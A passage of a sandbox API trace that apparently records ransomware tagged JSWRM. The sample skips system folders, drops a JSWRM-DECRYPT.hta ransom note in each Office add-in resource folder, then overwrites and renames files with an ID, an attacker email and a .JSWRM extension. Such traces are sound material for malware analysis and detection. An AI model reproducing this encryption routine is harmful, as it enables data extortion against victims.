ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0126.942] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0126.942] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1755c61, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="10266", cAlternateFileName="")) returned 1 [0126.942] lstrcmpiW (lpString1="10266", lpString2=".") returned 1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="..") returned 1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="...") returned 1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="windows") returned -1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="recovery") returned -1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="perflogs") returned -1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="documents and settings") returned -1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="$RECYCLE.BIN") returned 1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="system volume information") returned -1 [0126.942] lstrcmpiW (lpString1="10266", lpString2="msocache") returned -1 [0126.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\10266\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\10266\\jswrm-decrypt.hta")) returned 0xffffffff [0126.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\10266\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\10266\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.944] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.944] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0126.945] CloseHandle (hObject=0x338) returned 1 [0126.945] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\10266\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\10266\\jswrm-decrypt.hta")) returned 0x20 [0126.945] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\10266\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x42534e4a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0126.945] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.945] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x42534e4a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0126.945] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.945] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.945] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42534e4a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x42534e4a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x42534e4a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.946] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.946] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.946] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.946] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.946] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0126.946] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240fe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\10266\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\10266\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0126.947] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=70336) returned 1 [0126.947] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.947] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x112c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x112c0, lpOverlapped=0x0) returned 1 [0126.953] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.953] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x112c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x112c0, lpOverlapped=0x0) returned 1 [0126.954] CloseHandle (hObject=0x264) returned 1 [0126.954] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\10266\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\10266\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\10266\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\10266\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.955] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0126.955] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0126.955] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1027", cAlternateFileName="")) returned 1 [0126.956] lstrcmpiW (lpString1="1027", lpString2=".") returned 1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="..") returned 1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="...") returned 1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="windows") returned -1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="recovery") returned -1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="perflogs") returned -1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="documents and settings") returned -1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="$RECYCLE.BIN") returned 1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="system volume information") returned -1 [0126.956] lstrcmpiW (lpString1="1027", lpString2="msocache") returned -1 [0126.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1027\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1027\\jswrm-decrypt.hta")) returned 0xffffffff [0126.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1027\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1027\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.957] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.957] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0126.958] CloseHandle (hObject=0x338) returned 1 [0126.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1027\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1027\\jswrm-decrypt.hta")) returned 0x20 [0126.958] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1027\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4255b128, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x232240 [0126.958] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.958] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4255b128, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0126.958] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.959] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.959] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4255b128, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4255b128, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4255b128, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.959] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.959] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4266542, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4266542, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0126.959] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0126.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1027\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1027\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0126.960] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=70848) returned 1 [0126.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.960] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x114c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x114c0, lpOverlapped=0x0) returned 1 [0126.972] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.972] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x114c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x114c0, lpOverlapped=0x0) returned 1 [0126.972] CloseHandle (hObject=0x264) returned 1 [0126.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1027\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot 